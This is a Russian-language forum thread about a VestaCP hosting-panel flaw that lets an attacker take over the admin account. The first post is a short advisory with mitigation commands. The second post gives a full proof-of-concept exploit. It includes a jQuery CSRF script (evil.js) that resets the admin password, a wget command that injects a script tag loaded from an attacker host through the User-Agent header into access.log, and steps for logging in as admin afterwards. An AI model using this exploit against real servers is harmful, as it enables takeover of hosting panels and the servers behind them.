Серьёзная уязвимость в Vesta Control Panel

Информация Серьёзная уязвимость в Vesta Control Panel

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 727
Репутация
263
Jabber
Telegram
#1
Пользователь X-Shar разместил новый ресурс:

Серьёзная уязвимость в Vesta Control Panel - Vesta Control Panel взлом

Посмотреть вложение 58567

В хостинговой панели VestaCP обнаружена уязвимость, который позволяет злоумышленнику получить админский доступ к панели (а дальше и рутовский к серверу).

Уязвимость базируется на сбросе пароля администратора.

Завтра разработчики обещают выпустить обновление.

Пока рекомендую отключить панель командой:
Код:
service vesta stop
и проверить логи системы и панели - это файлы:
Код:
/var/log/audit/audit.log
/var/log/secure...
Узнать больше об этом ресурсе...
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 727
Репутация
263
Jabber
Telegram
#2
Сплоит для Весты:
Код:
Poc Exploit
================
1.Подготовьте js файл (evil.js):

function csrfWithToken(url,hanimisToken,password){
  $.get(url, function(gelen) {
    $('body').append($(gelen));
    $('form[id="vstobjects"]').css("display","none");
    var token = $(hanimisToken).attr("token");
    $('form[id="vstobjects"]').attr("action",url);
    $('input[name="v_password"]').val(password);
    $('form[id="vstobjects"]').submit();
  });
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");

2. Сделайте Get-запрос с этим js-файлом:
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver

3. Дожидаемся когда администратор прочитает access.log, что сделает инъекцию нашего evil.js

4. Логинимся с изменённым паролем:
http(s)://victim:8083/
 
Последнее редактирование:
Вверх